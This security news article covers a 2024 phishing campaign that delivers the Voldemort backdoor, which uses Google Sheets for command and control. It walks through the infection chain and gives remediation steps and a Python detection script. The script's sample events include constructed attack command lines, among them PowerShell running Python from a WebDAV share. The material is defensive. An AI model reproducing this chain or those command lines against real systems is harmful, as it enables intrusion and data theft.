Cyberattackers Exploit Google Sheets for Malware Control in Likely Espionage Campaign

In August 2024, cybersecurity experts uncovered a sophisticated malware campaign that uniquely exploits Google Sheets as a command-and-control (C2) platform. First detected on August 5, 2024, this campaign targets over 70 organizations across a wide range of industries, such as insurance, aerospace, academia, finance, healthcare, government, and more. The attackers, whose identities remain unknown, have launched the campaign by sending around 20,000 phishing emails, cleverly disguised as communications from tax authorities in countries including the U.S., U.K., France, Germany, Italy, India, and Japan.

These emails are crafted to deceive recipients into believing they contain important updates about tax filings, enticing them to click on malicious links. Once clicked, these links redirect users to an intermediate landing page that determines if the user's operating system is Windows. If so, the page employs the search-ms: URI protocol handler to deliver a malicious Windows shortcut (LNK) file masked as a PDF using Adobe Acrobat Reader icons. When this LNK file is executed, it triggers PowerShell to run Python.exe from a remote WebDAV share, dynamically loading a Python script that executes directly from the share without being downloaded. The script then collects system information, encodes it in Base64, and sends it to a domain controlled by the attackers.

To maintain covertness, a decoy PDF is displayed to the user while a password-protected ZIP file is downloaded from OpenDrive. This ZIP archive contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL named Voldemort, which further compromises the victim's system. Voldemort, a custom backdoor, is written in C and is capable of gathering information and deploying additional payloads, with Google Sheets serving as a unique C2, data exfiltration, and command execution channel.
The blend of advanced and rudimentary techniques employed in this campaign has led researchers to suggest that, while it exhibits traits typical of advanced persistent threats (APTs), it also incorporates methods commonly used in cybercrime, creating a hybrid threat profile.

Targeted Sectors and Scope of Attack

The malware campaign targets a diverse range of sectors, including:

  • Insurance
  • Aerospace
  • Transportation
  • Academia
  • Finance
  • Technology
  • Industrial
  • Healthcare
  • Automotive
  • Hospitality
  • Energy
  • Government
  • Media
  • Manufacturing
  • Telecom
  • Social Benefit Organizations

The campaign is suspected to be a form of cyber espionage, though it has not yet been attributed to any specific named threat actor. So far, approximately 20,000 phishing emails have been dispatched as part of the attacks, demonstrating a significant scale of operation.

Phishing Tactics and Initial Infection Vector

The phishing emails are crafted to appear as though they originate from tax authorities in countries such as the U.S., the U.K., France, Germany, Italy, India, and Japan. These emails inform recipients about purported changes to their tax filings and urge them to click on Google AMP Cache URLs, which redirect users to an intermediate landing page.

The landing page then inspects the User-Agent string to determine if the operating system is Windows. If Windows is detected, the page uses the search-ms: URI protocol handler to display a Windows shortcut (LNK) file. This LNK file masquerades as a PDF document by using an Adobe Acrobat Reader icon, tricking the victim into launching it.

Attack Vector and Payload Delivery

As described above, the tax-themed phishing emails lead victims through Google AMP Cache URLs to a landing page that checks the User-Agent string for Windows and, if it matches, uses the search-ms: URI protocol handler to present an LNK file disguised as a PDF with an Adobe Acrobat Reader icon. The stages that follow once that shortcut is launched are described below.

Upon execution of the LNK file, PowerShell is invoked to run Python.exe from a remote WebDAV share. The Python script is passed as an argument from another WebDAV share, causing it to execute without downloading any files locally. Dependencies are loaded directly from the WebDAV share, enabling the malware to gather system information and send it back to the attackers in a Base64-encoded format.

Decoy and Additional Payloads

After executing the initial payload, the malware displays a decoy PDF to the user to maintain the illusion of legitimacy. Simultaneously, it downloads a password-protected ZIP file from OpenDrive, which contains a legitimate executable named "CiscoCollabHost.exe" and a malicious DLL file "CiscoSparkLauncher.dll." The malicious DLL, named Voldemort by researchers, is side-loaded by the legitimate executable and used to further infiltrate the victim's system.

Payload Components and Post-Exploitation Activities

The downloaded ZIP archive contains two files:

  1. CiscoCollabHost.exe: A legitimate executable vulnerable to DLL side-loading.
  2. CiscoSparkLauncher.dll: A malicious DLL (known as Voldemort) that is sideloaded by the executable.

Voldemort is a custom backdoor written in C, capable of gathering information and loading next-stage payloads. The malware leverages Google Sheets for its C2 communication, data exfiltration, and executing commands sent by the operators.

The Voldemort Backdoor

Voldemort, a custom backdoor written in C, is equipped with capabilities for information gathering and loading additional payloads. What makes this campaign particularly unusual is its use of Google Sheets for C2, data exfiltration, and executing commands from the attackers. This approach is a departure from more traditional C2 methods, reflecting the attackers’ creativity and adaptability.

Attribution and Threat Assessment

While the campaign’s sophistication suggests alignment with advanced persistent threats (APT), the tactics employed—such as abusing file schema URIs and leveraging WebDAV and SMB for malware staging—are also popular in the cybercrime landscape. This duality has led researchers to describe the campaign as having “cybercrime vibes” despite its potential espionage objectives.

The threat actors behind this campaign have yet to be identified. However, Proofpoint was able to examine the contents of the Google Sheets used in the campaign, revealing six victims, including one believed to be a security researcher or sandbox environment.

Remediation Steps

  1. Block Malicious URLs: Implement URL filtering to block access to known malicious Google AMP Cache URLs and other suspicious domains.
  2. Monitor Network Traffic: Use network monitoring tools to detect unusual outbound traffic, especially to Google Sheets and WebDAV shares.
  3. Disable Search Protocol Handlers: Disable or restrict the use of the search-ms: URI protocol handler on Windows systems to prevent exploitation.
  4. Restrict PowerShell Execution: Enforce restrictive PowerShell execution policies to prevent unauthorized script execution.
  5. Inspect User-Agent Strings: Monitor and inspect User-Agent strings in network traffic to detect and block suspicious activities.
  6. Enhance Email Security: Deploy advanced email filtering and phishing protection to identify and block emails impersonating tax authorities.
  7. Patch and Update Software: Regularly update all software, especially applications that are frequently targeted or abused in attack chains like this one, such as Adobe Acrobat Reader and Python, to minimize vulnerabilities.
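The monitoring steps above (unusual outbound traffic to Google Sheets and WebDAV shares, search-ms: handler abuse, PowerShell launching Python off a WebDAV share, and the CiscoCollabHost.exe / CiscoSparkLauncher.dll side-load pair) can be expressed as a small set of detection rules run over endpoint telemetry. The following is an added example written for this write-up; it is not Proofpoint's code or an artifact of the campaign. It assumes Sysmon-style events (ProcessCreate, ImageLoad, NetworkConnect) with the field names shown, assumes the backdoor reaches Google Sheets through the sheets.googleapis.com API host, and the sample events, paths and the 203.0.113.10 address are constructed test data, not indicators from the campaign.

```python
"""Detection rules for the Voldemort infection chain, run over constructed
Sysmon-style events. Example code added for this write-up; field names,
sample events and the sheets.googleapis.com assumption are not from the page."""
import re
from dataclasses import dataclass

# Indicators taken from the write-up: WebDAV UNC paths (\\host@port\DavWWWRoot\...),
# the search-ms: URI scheme, the two file names in the ZIP, and Google Sheets as C2.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\\", re.IGNORECASE)
SEARCH_MS = re.compile(r"\bsearch-ms:", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
SHEETS_HOST = "sheets.googleapis.com"  # assumed API endpoint; the page only says "Google Sheets"


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_search_ms(ev):
    # The search-ms: handler hands the URI to Explorer; a browser parent means a web page triggered it.
    if ev["event"] == "ProcessCreate" and SEARCH_MS.search(ev.get("command_line", "")) \
            and basename(ev.get("parent_image", "")) in BROWSERS:
        return Finding("search_ms_from_browser", ev["command_line"])


def rule_powershell_webdav_python(ev):
    # PowerShell launching python.exe straight off a WebDAV share (nothing written to disk).
    cl = ev.get("command_line", "")
    if ev["event"] == "ProcessCreate" and basename(ev["image"]) in {"powershell.exe", "pwsh.exe"} \
            and WEBDAV_UNC.search(cl) and "python" in cl.lower():
        return Finding("powershell_webdav_python", cl)


def rule_dll_sideload(ev):
    # CiscoCollabHost.exe loading CiscoSparkLauncher.dll from outside a trusted install directory.
    if ev["event"] == "ImageLoad" and basename(ev["image"]) == "ciscocollabhost.exe" \
            and basename(ev["image_loaded"]) == "ciscosparklauncher.dll" \
            and not ev["image_loaded"].lower().startswith(TRUSTED_DIRS):
        return Finding("dll_sideload", ev["image_loaded"])


def rule_sheets_nonbrowser(ev):
    # Google Sheets API traffic from any process that is not a browser.
    if ev["event"] == "NetworkConnect" and ev.get("dest_host", "").lower().endswith(SHEETS_HOST) \
            and basename(ev["image"]) not in BROWSERS:
        return Finding("sheets_api_from_nonbrowser", f'{ev["image"]} -> {ev["dest_host"]}')


RULES = (rule_search_ms, rule_powershell_webdav_python, rule_dll_sideload, rule_sheets_nonbrowser)


def scan(events):
    """Apply every rule to every event and return the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry (203.0.113.10 is a documentation address, not a real indicator).
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"C:\Windows\explorer.exe" "search-ms:displayname=Tax%20Filing&crumb=location:\\203.0.113.10@80\DavWWWRoot"'},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe \\203.0.113.10@80\DavWWWRoot\python.exe \\203.0.113.10@80\DavWWWRoot\stage.py"},
    {"event": "ImageLoad", "image": r"C:\Users\alice\AppData\Local\Temp\update\CiscoCollabHost.exe",
     "image_loaded": r"C:\Users\alice\AppData\Local\Temp\update\CiscoSparkLauncher.dll"},
    {"event": "NetworkConnect", "image": r"C:\Users\alice\AppData\Local\Temp\update\CiscoCollabHost.exe",
     "dest_host": "sheets.googleapis.com", "dest_port": 443},
    # Benign look-alikes that must not fire: a browser using Sheets, a local script, a proper install.
    {"event": "NetworkConnect", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "sheets.googleapis.com", "dest_port": 443},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"event": "ImageLoad", "image": r"C:\Program Files\Cisco Spark\CiscoCollabHost.exe",
     "image_loaded": r"C:\Program Files\Cisco Spark\CiscoSparkLauncher.dll"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Each rule keys on the combination the campaign relies on rather than a single string: explorer.exe receiving a search-ms: URI is normal when a user clicks a saved search, but not when a browser is the parent; a Sheets API connection is normal from a browser, but not from an executable in a temp directory; and the side-load rule only fires when the DLL loads from outside a trusted install path, so a genuine Cisco installation in Program Files stays quiet.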